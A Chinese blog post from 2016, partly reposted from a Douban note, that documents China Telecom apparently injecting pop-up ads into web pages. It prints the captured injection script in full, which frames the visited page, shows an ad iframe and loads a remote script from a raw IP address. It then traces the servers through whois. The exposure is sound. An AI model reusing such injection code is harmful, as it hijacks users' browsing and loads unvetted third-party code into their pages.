中国电信的右下角弹窗广告代码iframe,刷新网页后又没有了

2016年6月18日 发表评论 阅读评论

很奇怪闪电站小猪这个不是第三方承包的电信服务商都出现广告了,而且是强制插入的,修改DNS都没用!闪电站小猪买的是电信最贵的包年套餐了,打开网页就发现广告。

在多次投诉无效后,闪电站小猪决定对电信的弹窗广告的技术进行一些分析,让更多的人了解电信的无耻做法。电信的这种弹窗广告具有一定的随机性,所以除非你做好要和它较真的准备,否则事后是很难找到证据的。

早上,当闪电站小猪打开浏览器某网页的时候,小猪再一次发现了电信的弹窗广告在网页的右下角弹了出来——在小猪对电信发起了两次投诉,电信客服承诺闪电站小猪我取消这种强加的 “服务”(草泥马的)之后!

电信的弹窗代码:

<!DOCTYPE HTML><html><head><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title></title><script>!function(){function a(a){return document.getElementById(a)}function b(){try{var b=document.all?document.frames["mf"].document:a("mf").contentDocument;document.title=b?b.title:""}catch(c){}}function c(){var b=1,c=0,d=2,e=1,f=1,g=0,h=0,i=1,j=0,k=0,l=0,m=0,n=1,o=67,p="/zxcdvfbghndsmBsECUCqZfjR2SUFODheSaVeSVJvqCISG65anERRwBPS7ezvDN6I/A==",q="BjJNPo/UajmVUegx+9owS8WAlim1U0GYUm5a36lfLSYQtbOPq81QrYHhDgANv+wablLNfT/PJODh+ka/qoGvIMiqBvFBsJdGnRnrWWdTxKz4m6Hd0DX5j4rJol0GSX+FzWy9vLMhq9bfsB4BNOQd5cD8KZZJFvLlpAOJtI8WiXflD+Az01i7Nd0+Yzw2CmKNPSf5/ZrkuBpcdglOFMmfKlKsCeFD2HIe1v0RWeyGD/GDB0MnYzv+xj0wPxV2oQUfecE1NMPSwHxYGv6mXr9hKywejlS6DIpvl8fTYjj6WwO6yTV0WCtPAP90u2YTDpFGywSMg8F9nUI=",r="http://120.27.28.39/hw/kd580082.html",s="http://games.qq.com",t="/a/20160530/035138.htm",u=document.documentElement.clientHeight,v=document.documentElement.clientWidth;switch(mr.tr=c,mr.ac=b,mr.al=r,mr.mh=s,mr.mi=t,mr.ct=d,mr.hs=p,mr.ps=q,mr.ht=o,i){case 1:mr.s.p={left:0,top:0};break;case 2:mr.s.p={left:0,bottom:0};break;case 3:mr.s.p={right:"20px",top:0};break;case 4:mr.s.p={right:"20px",bottom:0};break;case 5:mr.s.p={left:(v-e)/2+"px",top:(u-f)/2+"px"};break;default:mr.s.p={left:g+"px",top:h+"px"}}switch(mr.s.se={width:e+"px",height:f+"px"},n){case 1:mr.h.p={left:0,top:0};break;case 2:mr.h.p={left:0,bottom:0};break;case 3:mr.h.p={right:"20px",top:0};break;case 4:mr.h.p={right:"20px",bottom:0};break;case 5:mr.h.p={left:(v-j)/2+"px",top:(u-k)/2+"px"};break;default:mr.h.p={left:l+"px",top:m+"px"}}mr.h.se={width:j+"px",height:k+"px"},mr.oa=a("ad"),mr.om=a("mf"),mr.om.style.height=u+"px"}function d(){var b=parseInt(mr.s.se["height"]);mr.oa.innerHTML=’<div id="dc" style="display:block;height:20px;line-height:20px;background-color:#ccc;background-color:rgba(180,180,180,0.8);text-align:right;position: absolute;right: 0px;top: 0;z-index: 2;padding: 2px 4px;"><a id="dca" href="javascript:;" style="text-decoration:none;font-size:20px;color:#000"></a></div><div id="ifd" style="width:100%;height:100%;box-sizing:border-box;text-align:center;position:absolute;left:0;top:0;overflow:hidden"><iframe id="ife" src="’+mr.al+’" width="100%" marginwidth="0" marginheight="0" frameborder="0" style="border:0;height:’+b+’px">’+"</iframe>"+"</div>",mr.od=a("dc"),mr.oda=a("dca"),mr.oam=a("ife")}function e(){switch(mr.ct){case 1:mr.od.style.display="none";break;case 2:mr.oda.innerHTML="X";break;case 3:mr.od.style.display="none";break;case 4:mr.od.style.display="none";break;case 5:mr.oda.innerHTML="-";break;case 6:mr.oda.innerHTML="-";break;default:mr.oda.innerHTML="X"}}function f(){setTimeout(function(){j(),mr.ih=!1},1e3*mr.tr)}function g(){switch(mr.ct){case 1:setTimeout(function(){mr.ih&&(mr.ih=!1,n())},1e3*mr.tr);break;case 2:mr.od.onclick=function(){mr.ih&&(mr.ih=!1,n())};break;case 3:f(),mr.od.onclick=function(){mr.ih||(mr.ih=!0,k(mr.s.se,mr.s.p),f())};break;case 4:f(),mr.od.onmouseenter=function(){mr.ih||(mr.ih=!0,k(mr.s.se,mr.s.p),f())};break;case 5:mr.od.onclick=function(){mr.ih?(mr.ih=!1,j()):(mr.ih=!0,k(mr.s.se,mr.s.p))};break;case 6:mr.od.onclick=function(){mr.ih&&(mr.ih=!1,j())},mr.od.onmouseover=function(){mr.ih||(mr.ih=!0,k(mr.s.se,mr.s.p))}}}function h(a,b,c){if(i(a,b),mr.ih){var d=mr.mh+mr.mi;mr.sx=d.indexOf("?")>0?"&":"?",mr.om.src=mr.mh+mr.mi+mr.sx,1==mr.ac?(mr.oa.style.display="block",setTimeout(function(){mr.om.style.display="block"},500)):(mr.om.style.display="block",setTimeout(function(){mr.oa.style.display="block"},2e3))}}function i(a,b){l(a),m(b)}function j(){i(mr.h.se,mr.h.p),mr.oam.style["height"]=parseInt(mr.h.se["height"])+"px",mr.od.style.display="block",mr.oda.innerHTML="+"}function k(a,b){(3==mr.ct||4==mr.ct)&&(mr.od.style.display="none"),mr.oda.innerHTML="-",i(a,b)}function l(a){for(var b in a)mr.oa.style[b]=a[b];mr.oam.style["height"]=parseInt(mr.s.se["height"])+"px"}function m(a){mr.oa.style.left="",mr.oa.style.top="",mr.oa.style.right="",mr.oa.style.bottom="";for(var b in a)mr.oa.style[b]=a[b]}function n(){mr.oa.parentNode.removeChild(mr.oa)}window.onload=function(){if(c(),window==top){var a=document.createElement("img");a.src=mr.mh+mr.hs,d(),e(),h(mr.s.se,mr.s.p),g(),b(),extCallback="undefined"==typeof extCallback?function(){}:extCallback,extCallback()}else window.location.href=mr.mh+mr.mi+mr.sx},window.onresize=function(){c(),mr.om.style.height=document.documentElement.clientHeight+"px"},window.mr={co:’haohan’,oa:null,om:null,od:null,oam:null,ac:1,ct:1,ps:"",hs:"",al:"",mh:"",mi:"",sx:"",ih:!0,ht:"",s:{p:{left:0,top:0},se:{width:0,height:0}},h:{p:{left:0,top:0},se:{width:0,height:0}}}}();</script><script>function extCallback(){var url = ‘http://139.129.220.86/js/jsstyle-hh.js’;

var s = document.createElement("script")

s.src = url;

document.head.appendChild(s);}</script></head><body style="margin:0;padding:0;overflow:hidden;position:relative;height:100%;"><div id="ad" style="display:none;position:absolute;z-index:100;overflow:hidden;background:#fff;"></div><iframe id="mf" scrolling="auto" width="100%" frameborder="0" height="100%" marginwidth="0" marginheight="0" style="display:none;border:0"></iframe></body></html>

揭露中国电信的弹窗广告伎俩——各个省的电信都有这么干

https://www.douban.com/note/234518190/

像中国电信这种流氓无赖企业,不找到确凿证据,它是不会认账的。我使用的是chrome的浏览器,可以在打开的页面上      点击右键 ====》 审查元素    来分析页面。

下面是被电信污染后弹出广告的页面的

放大图

比较下正常的页面

注意上面两个页面的内容是打开同一个页面显示的源代码。第一个被电信玷污的新浪微博页面,
第二个是没有被玷污的新浪微博页面。

++++++++++++++++++++++++++++++++++++++++++++++++++++
如果想向我一样以后准备投诉电信什么的,可以把这个带有广告的网页保存下来。
这个应该可以算是证据了,懂得HTML语言的人应该都可以判断出来。
++++++++++++++++++++++++++++++++++++++++++++++++++++

广告页面分析
==================

看到了没?!  显示广告的页面的真实地址是 : http://220.191.158.69:10003/a/p?adid=201632&ts=1346545051&tcca=MDU3MTAwNDA2MzAx&urip=1942072046&stime=61&spid=769393691

如果你点击上面这个链接,会发现可能显示的是一个空白的页面。如果你在出现电信广告弹窗的时候,就点击网页源代码中的这个链接。可能会看到一个空白页面,可能页面上有个没有正常显示的方框。

但是如果你之后再去点击同样一个链接,则会显示一个空白的页面。因为电信显然不想被抓住把柄,除非你一开始就想到要去保存证据,否则事后去找他们理论,它们是不认账的。 电信也知道这是不合法的,所以也想到要毁灭证据。

但是页面可以删除,服务器还是在的。我们分析下这个服务器的地址: 220.191.158.69:1003
通过google查询服务器的 whois 信息,看看这是谁的服务器:

看到划线的没?这能说明什么,用的也是电信的服务器,而且服务器就在浙江省内。电信在地址里面直接用的是ip,没有用域名,估计也是怕域名的注册备案信息中留下把柄!

广告弹窗分析
================

电信的弹窗广告实际上是一个显示gif的页面,如果点击就会打开广告对应的页面。

广告的保存地址为: http://t.buming.net/zzhx/indexzjpt.html?c=http%3A%2F%2F220.191.158.69%3A10003%2Fa%2Fadclick%3Fspid%3D769393691%26adid%3D201632%26tcca%3DMDU3MTAwNDA2MzAx%26urip%3D1942072046

我们查询下这个域名的情况:

这个域名对应的真正ip地址是:

查看下这个域名对应的whois信息

广东境内某电信服务器。

===================================

经过上面简单的分析,基本上可以证明就是电信搞的鬼了。因为这种弹窗广告显然只有电信这种网络接入服务商才能实现。

希望有更多的人了解电信的这种行为,打爆电信的投诉电话。如果有可能追究电信的法律责任更好,也算是为中国网民除害!!!


转载请注明来自:[MSN Spaces]http://msn.shandian.biz/1131.html

  1. 本文目前尚无任何评论.